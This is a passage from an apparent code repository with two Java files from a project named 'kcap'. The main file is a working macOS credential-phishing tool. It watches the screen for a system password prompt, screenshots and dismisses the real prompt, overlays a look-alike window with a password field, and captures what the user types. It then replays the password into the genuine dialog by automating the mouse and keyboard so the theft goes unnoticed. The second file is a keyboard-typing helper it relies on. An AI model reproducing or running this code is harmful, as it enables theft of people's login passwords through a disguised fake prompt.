693, 693};
15 | private static BufferedImage popupImg = new BufferedImage(50, 50, BufferedImage.TYPE_INT_ARGB);
16 | static Robot r;
17 |
18 | public static void main(String[] args) throws Exception {
19 | //first blank our dock image. You could also swap it with finder or something, but meh, I'm lazy.
20 | //Also, you don't have to use reflection to invoke this method. Unless your Java compile environment is awful like mine.
21 | Object app = Class.forName("com.apple.eawt.Application").getDeclaredMethod("getApplication").invoke(null);
22 | app.getClass().getMethod("setDockIconImage", Image.class).invoke(app, popupImg); //at this point, an empty image
23 |
24 | //Next prep our static stuff
25 | r = new Robot();
26 | sr = new Rectangle(Toolkit.getDefaultToolkit().getScreenSize());
27 |
28 | //Java takes a while to load up the first window. We do it now, then hide it so we're ready to go later
29 | JFrame spoofFrame = new JFrame();
30 | JPanel pane = new JPanel() {
31 | @Override
32 | protected void paintComponent(Graphics g) {
33 | super.paintComponent(g);
34 | g.drawImage(popupImg, 0, 0, null);
35 | }
36 | };
37 | spoofFrame.setContentPane(pane);
38 | spoofFrame.setUndecorated(true);
39 | spoofFrame.setBounds(sr.width-10, sr.height - 10, 300, 400);
40 | spoofFrame.setLayout(null);
41 | JPasswordField jpass = new JPasswordField();
42 | jpass.setFont(jpass.getFont().deriveFont(12.0f));
43 | jpass.setColumns(30);
44 | jpass.setBounds(167, 133, 258, 21);
45 | pane.add(jpass);
46 | spoofFrame.addMouseListener(new MouseAdapter(){
47 | public void mouseClicked(MouseEvent e) {
48 | if(e.getY() > 180 && e.getX() > 250){
49 | spoofFrame.setVisible(false);
50 | if(e.getX() > 340){
51 | gotPassword(jpass);
52 | }
53 | System.exit(0);
54 | }
55 | }
56 | });
57 | jpass.addActionListener(new ActionListener(){
58 | public void actionPerformed(ActionEvent e) {
59 | gotPassword(jpass);
60 | }
61 | });
62 | spoofFrame.setVisible(true);
63 |
64 | //Now we wait for the prompt to come up
65 | Rectangle rct = new Rectangle((int) sr.getWidth() / 2 - 150, (int) sr.getHeight() / 2 - 190, 100, 100);
66 | int[] capturedPixels = new int[rct.height * rct.width];
67 | boolean foundPrompt = false;
68 | snap: while (!foundPrompt) {
69 | final int[] pixels = ((DataBufferInt) new Robot().createScreenCapture(rct).getData().getDataBuffer()).getData();
70 | int offset = 0;
71 | for (int pixInt : pixels) {
72 | int posInt = pixInt & 0x00FFFFFF;
73 | capturedPixels[offset++] = ((posInt >> 16) % 256) + ((posInt >> 8) % 256) + (posInt % 256);
74 | }
75 | int idx = 0;
76 | //check each line and see if you find it
77 | for(int i = 0; i < USERPASS_PIXELS.length; i += REF_WIDTH){
78 | idx = findPixels(capturedPixels, idx, USERPASS_PIXELS, i, REF_WIDTH);
79 | if(idx == -1){
80 | spoofFrame.setVisible(false);
81 | r.delay(100);
82 | continue snap;
83 | }else{
84 | idx += rct.width;
85 | }
86 | }
87 | break;
88 | }
89 | //Step 2: spoof the input.
90 | //First grab just the popup screenshot. To make it more portable, you should scan the pixels instead of using these hardcoded values.
91 | //Things like the retina displays can change the pixel widths and locations of the popups.
92 | popupRect = new Rectangle((int) sr.getWidth() / 2 - 222, (int) sr.getHeight() / 2 - 280, 442, 230);
93 | popupImg = new Robot().createScreenCapture(popupRect);
94 | //Find top of password box
95 | int pwtop = 140;
96 | int pixval = popupImg.getRGB(200, pwtop);
97 | while((pixval & 0x00F0F0F0) == 0x00F0F0F0 && pwtop > 100){ //close enough to white
98 | pixval = popupImg.getRGB(200, pwtop--);
99 | }
100 | jpass.setBounds(167, pwtop+1, 258, 22);
101 | spoofFrame.setBounds(popupRect);
102 | spoofFrame.setAlwaysOnTop(true);
103 | spoofFrame.setVisible(true);
104 | //get current mouse pos
105 | triggerLoc = MouseInfo.getPointerInfo().getLocation();
106 | //close the existing window
107 | r.mouseMove((int)sr.getWidth() / 2 + 80, (int)sr.getHeight() / 2 - 75);
108 | r.mousePress(InputEvent.BUTTON1_MASK);
109 | r.mouseRelease(InputEvent.BUTTON1_MASK);
110 | //move mouse back
111 | r.mouseMove(triggerLoc.x, triggerLoc.y);
112 | //Make the new frame
113 | spoofFrame.setVisible(true);
114 | app.getClass().getMethod("requestForeground", boolean.class).invoke(app, true); //at this point, an empty image
115 | }
116 | // Saves the password (infects your box ... whatever) then pops up the original password prompt and sends it on
117 | public static void gotPassword(JPasswordField jpass){
118 | String pw = new String(jpass.getPassword());
119 | System.out.println("Intercepted Password! Your password is:\n"+pw);
120 | Point nowPos = MouseInfo.getPointerInfo().getLocation();
121 | //Popup new prompt
122 | r.mouseMove(triggerLoc.x, triggerLoc.y);
123 | r.mousePress(InputEvent.BUTTON1_MASK);
124 | r.mouseRelease(InputEvent.BUTTON1_MASK);
125 | r.delay(100);
126 | //Drag real prompt offscreen
127 | r.mouseMove(popupRect.x + popupRect.width - 2, popupRect.y + 2);
128 | r.mousePress(InputEvent.BUTTON1_MASK);
129 | r.mouseMove(0,sr.height);
130 | r.mouseRelease(InputEvent.BUTTON1_MASK);
131 | //Type password
132 | new Keyboard(r).type(pw);
133 | //Drag real prompt back onscreen
134 | r.mousePress(InputEvent.BUTTON1_MASK);
135 | r.mouseMove(popupRect.x + popupRect.width - 2, popupRect.y + 2);
136 | r.mouseRelease(InputEvent.BUTTON1_MASK);
137 | //Enter!
138 | r.keyPress(KeyEvent.VK_ENTER);
139 | r.keyRelease(KeyEvent.VK_ENTER);
140 | r.mouseMove(nowPos.x, nowPos.y);
141 | System.exit(0);
142 | }
143 | //Finds a row of pixels in a bigger array, in a "close enough" sense.
144 | public static int findPixels(int[] outerArray, int outerOffset, int[] pixArray, int smallOffset, int smallLen) {
145 | for(int i = outerOffset; i < outerArray.length - smallLen+1; ++i) {
146 | boolean found = true;
147 | for(int j = 0; j < smallLen; j++) {
148 | if (Math.abs(outerArray[i+j] - pixArray[j+smallOffset]) > 60) {
149 | found = false;
150 | break;
151 | }
152 | }
153 | if (found) return i;
154 | }
155 | return -1;
156 | }
157 | }
158 |
--------------------------------------------------------------------------------
/kcap/src/kcap/Keyboard.java:
--------------------------------------------------------------------------------
1 | package kcap;
2 | import java.awt.AWTException;
3 | import java.awt.Robot;
4 | import static java.awt.event.KeyEvent.*;
5 |
6 | public class Keyboard {
7 |
8 | private Robot robot;
9 |
10 | public static void main(String... args) throws Exception {
11 | Keyboard keyboard = new Keyboard();
12 | keyboard.type("Hello there, how are you?");
13 | }
14 |
15 | public Keyboard() throws AWTException {
16 | this.robot = new Robot();
17 | }
18 |
19 | public Keyboard(Robot robot) {
20 | this.robot = robot;
21 | }
22 |
23 | public void type(CharSequence characters) {
24 | int length = characters.length();
25 | for (int i = 0; i < length; i++) {
26 | char character = characters.charAt(i);
27 | type(character);
28 | }
29 | }
30 |
31 | public void type(char character) {
32 | switch (character) {
33 | case 'a': doType(VK_A); break;
34 | case 'b': doType(VK_B); break;
35 | case 'c': doType(VK_C); break;
36 | case 'd': doType(VK_D); break;
37 | case 'e': doType(VK_E); break;
38 | case 'f': doType(VK_F); break;
39 | case 'g': doType(VK_G); break;
40 | case 'h': doType(VK_H); break;
41 | case 'i': doType(VK_I); break;
42 | case 'j': doType(VK_J); break;
43 | case 'k': doType(VK_K); break;
44 | case 'l': doType(VK_L); break;
45 | case 'm': doType(VK_M); break;
46 | case 'n': doType(VK_N); break;
47 | case 'o': doType(VK_O); break;
48 | case 'p': doType(VK_P); break;
49 | case 'q': doType(VK_Q); break;
50 | case 'r': doType(VK_R); break;
51 | case 's': doType(VK_S); break;
52 | case 't': doType(VK_T); break;
53 | case 'u': doType(VK_U); break;
54 | case 'v': doType(VK_V); break;
55 | case 'w': doType(VK_W); break;
56 | case 'x': doType(VK_X); break;
57 | case 'y': doType(VK_Y); break;
58 | case 'z': doType(VK_Z); break;
59 | case 'A': doType(VK_SHIFT, VK_A); break;
60 | case 'B': doType(VK_SHIFT, VK_B); break;
61 | case 'C': doType(VK_SHIFT, VK_C); break;
62 | case 'D': doType(VK_SHIFT, VK_D); break;
63 | case 'E': doType(VK_SHIFT, VK_E); break;
64 | case 'F': doType(VK_SHIFT, VK_F); break;
65 | case 'G': doType(VK_SHIFT, VK_G); break;
66 | case 'H': doType(VK_SHIFT, VK_H); break;
67 | case 'I': doType(VK_SHIFT, VK_I); break;
68 | case 'J': doType(VK_SHIFT, VK_J); break;
69 | case 'K': doType(VK_SHIFT, VK_K); break;
70 | case 'L': doType(VK_SHIFT, VK_L); break;
71 | case 'M': doType(VK_SHIFT, VK_M); break;
72 | case 'N': doType(VK_SHIFT, VK_N); break;
73 | case 'O': doType(VK_SHIFT, VK_O); break;
74 | case 'P': doType(VK_SHIFT, VK_P); break;
75 | case 'Q': doType(VK_SHIFT, VK_Q); break;
76 | case 'R': doType(VK_SHIFT, VK_R); break;
77 | case 'S': doType(VK_SHIFT, VK_S); break;
78 | case 'T': doType(VK_SHIFT, VK_T); break;
79 | case 'U': doType(VK_SHIFT, VK_U); break;
80 | case 'V': doType(VK_SHIFT, VK_V); break;
81 | case 'W': doType(VK_SHIFT, VK_W); break;
82 | case 'X': doType(VK_SHIFT, VK_X); break;
83 | case 'Y': doType(VK_SHIFT, VK_Y); break;
84 | case 'Z': doType(VK_SHIFT, VK_Z); break;
85 | case '`': doType(VK_BACK_QUOTE); break;
86 | case '0': doType(VK_0); break;
87 | case '1': doType(VK_1); break;
88 | case '2': doType(VK_2); break;
89 | case '3': doType(VK_3); break;
90 | case '4': doType(VK_4); break;
91 | case '5': doType(VK_5); break;
92 | case '6': doType(VK_6); break;
93 | case '7': doType(VK_7); break;
94 | case '8': doType(VK_8); break;
95 | case '9': doType(VK_9); break;
96 | case '-': doType(VK_MINUS); break;
97 | case '=': doType(VK_EQUALS); break;
98 | case '~': doType(VK_SHIFT, VK_BACK_QUOTE); break;
99 | case '!': doType(VK_SHIFT, VK_1); break;
100 | case '@': doType(VK_SHIFT, VK_2); break;
101 | case '#': doType(VK_SHIFT, VK_3); break;
102 | case '$': doType(VK_SHIFT, VK_4); break;
103 | case '%': doType(VK_SHIFT, VK_5); break;
104 | case '^': doType(VK_SHIFT, VK_6); break;
105 | case '&': doType(VK_SHIFT, VK_7); break;
106 | case '*': doType(VK_SHIFT, VK_8); break;
107 | case '(': doType(VK_SHIFT, VK_9); break;
108 | case ')': doType(VK_SHIFT, VK_0); break;
109 | case '_': doType(VK_SHIFT, VK_MINUS); break;
110 | case '+': doType(VK_SHIFT, VK_EQUALS); break;
111 | case '\t': doType(VK_TAB); break;
112 | case '\n': doType(VK_ENTER); break;
113 | case '[': doType(VK_OPEN_BRACKET); break;
114 | case ']': doType(VK_CLOSE_BRACKET); break;
115 | case '\\': doType(VK_BACK_SLASH); break;
116 | case '{': doType(VK_SHIFT, VK_OPEN_BRACKET); break;
117 | case '}': doType(VK_SHIFT, VK_CLOSE_BRACKET); break;
118 | case '|': doType(VK_SHIFT, VK_BACK_SLASH); break;
119 | case ';': doType(VK_SEMICOLON); break;
120 | case ':': doType(VK_COLON); break;
121 | case '\'': doType(VK_QUOTE); break;
122 | case '"': doType(VK_QUOTEDBL); break;
123 | case ',': doType(VK_COMMA); break;
124 | case '<': doType(VK_SHIFT, VK_COMMA); break;
125 | case '.': doType(VK_PERIOD); break;
126 | case '>': doType(VK_SHIFT, VK_PERIOD); break;
127 | case '/': doType(VK_SLASH); break;
128 | case '?': doType(VK_SHIFT, VK_SLASH); break;
129 | case ' ': doType(VK_SPACE); break;
130 | default:
131 | throw new IllegalArgumentException("Cannot type character " + character);
132 | }
133 | }
134 |
135 | private void doType(int... keyCodes) {
136 | doType(keyCodes, 0, keyCodes.length);
137 | }
138 |
139 | private void doType(int[] keyCodes, int offset, int length) {
140 | if (length == 0) {
141 | return;
142 | }
143 |
144 | robot.keyPress(keyCodes[offset]);
145 | doType(keyCodes, offset + 1, length - 1);
146 | robot.keyRelease(keyCodes[offset]);
147 | }
148 |
149 | }
--------------------------------------------------------------------------------